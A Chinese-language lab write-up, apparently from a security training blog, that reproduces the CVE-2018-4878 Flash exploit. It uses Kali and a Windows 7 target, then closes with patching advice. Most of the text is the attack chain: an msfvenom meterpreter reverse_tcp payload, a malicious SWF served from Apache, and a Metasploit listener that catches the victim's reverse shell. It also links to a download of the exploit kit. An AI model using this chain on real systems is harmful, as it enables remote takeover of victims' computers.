[漏洞復現] CVE-2018-4878 Flash 0day

1、漏洞概述

2018年2月1號,Adobe官方發布安全通報(APSA18-01),聲明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。

攻擊者通過構造特殊的Flash鏈接,當用戶用瀏覽器/郵件/Office訪問此Flash鏈接時,會被「遠程代碼執行」,並且直接被getshell。

直到2018年2月5號,Adboe才發布補丁來修復此0 day漏洞。

互聯網上出現的基於此Flash 0day漏洞進行攻擊的樣本,其實在2017年底就已經由韓國計算機應急小組(KR-CERT)首次發現。

目前,全網已經有比較成熟的針對此Flash漏洞的利用代碼,接下來,我們為大家復現整個過程。

2、漏洞復現環境

Kali Linux + Windows 7 sp1

滲透機:Kali Linux (ip:172.16.70.216)

靶機:Windows 7 sp1 (ip:172.16.70.199)

exp:cve-2018-4878.py

flash:flashplayer_activex_28.0.0.137.exe

註:此實驗環境所用滲透機和靶機,跟之前文章所分享一致。為了節省大家實驗時間,我將此實驗涉及到的工具全部上傳到網盤=>

鏈接:pan.baidu.com/s/1dotCoC 密碼:0li0

3、實驗流程

①將網盤中的CVE-2018-4878-master目錄下載下來,並放入Kali Linux桌面

②使用msfvenom生成shell代碼

生成代碼,其中lhost為kali的ip地址,lport為自定義的埠號

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888 -f python>shellcode.txt

查看代碼文件

root@kali:~# cat shellcode.txt

③進入CVE-2018-4878-master目錄,編輯CVE-2018-4878.py文件

將上面msfvenom生成的代碼覆蓋掉原來的代碼:

修改CVE-2018-4878.py下面的文件信息(後面會用到,之後保存修改退出):

④Kali Linux進入CVE-2018-4878-master路徑,用Python執行CVE-2018-4878-master.py代碼

root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py root@kali:~/Desktop/CVE-2018-4878-master# ls -l

⑤Kali Linux開啟Apache2服務,並將上面的2個文件放入/var/www/html目錄中(apache web路徑)

root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf

此時,Kali Linux上Web服務啟動,並且具備index2.html這個頁面。只要靶機啟用flash並訪問了這個頁面,則可以直接被控制。

⑥Kali Linux開啟Shell會話監聽

使用handler監聽模塊 msf > use exploit/multi/handler 回彈一個tcp連接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 設置kali滲透機的ip地址 msf exploit(handler) > set lhost 172.16.70.216 設置監聽埠,這個需跟上面msfvenom設置的埠一致 msf exploit(handler) > set lport 8888 開啟監聽,等待肉雞上線 msf exploit(handler) > exploit

⑦Windows7 安裝flash插件,並用IE瀏覽器訪問頁面

搜索flash最新的28版本

安裝flash插件

使用Win7內置IE 8瀏覽器訪問頁面:172.16.70.216/index2.ht

⑧Kali Linux 上獲取meterpreter shell,並進行管理

實驗總結:

可以看到,最終由於Flash存在CVE-2018-4878這個高危漏洞,導致Windows靶機訪問含flash的頁面時,直接被Kali Linux控制。

真實環境下,很多黑客基於此Flash漏洞,結合社會工程學,例如將網頁鏈接放置在誘導郵件中,欺騙大量用戶點擊,來達到最規模攻擊效果。

在這裡也呼籲大家:平常要非常小心陌生鏈接,類似這種「一點就中招」的高級滲透攻擊,肯定還有很多沒有浮出水面。像這個2017年其實已經出現的漏洞,早就有黑客已經在使用了,而中招者完全不知情,整個攻擊手法非常隱蔽。而2018年2月才有安全補丁,在這期間,有多少肉雞被控制,這個難以想像。很多0day漏洞,黑客比大部分人都要提前知曉,在安全廠商沒有出安全公告,或者沒有打安全補丁的情況下,一個不小心,就會導致電腦被劫持,數據被竊取,造成極大的損失。

4、漏洞修復

①直接到Adobe Flash官網,下載最新版本:get.adobe.com/cn/flashp

②安裝常見殺毒軟體,開啟實時防護和殺毒引擎實時升級。


【了解更多】

知乎專欄:跟傑哥學網路與安全

新浪微博:@拼客學院陳鑫傑

微信公眾號:拼客院長陳鑫傑(搜索"pingsec"即可關注,大牛都在看)

拼客學院:pinginglab.net(專註網路|安全|運維的IT學院)

【相關文章】

網路安全入坑指南

[冇眼睇]揭秘地下色情誘導網站,上車吧!

拼客學院陳鑫傑:圖解ARP協議(三)ARP防禦篇-如何揪出"內鬼"並"優雅的還手"?

【視頻教程】

5天速成白帽子黑客

一周入門Linux運維

推薦閱讀:

如何看待任天堂 NS 主機所有版本被國外組織攻破?
物聯網安全拔「牙」實戰——低功耗藍牙(BLE)初探 疑問?
如何成為一名優秀的黑客?
哪些網站有比較系統的黑客教程?
如何看待俄羅斯黑客組織休閑熊和奇異熊攻克DNC伺服器,公開221頁美國民主黨整理的Trump黑材料?

TAG:信息安全 | 黑客Hacker | 滲透測試 |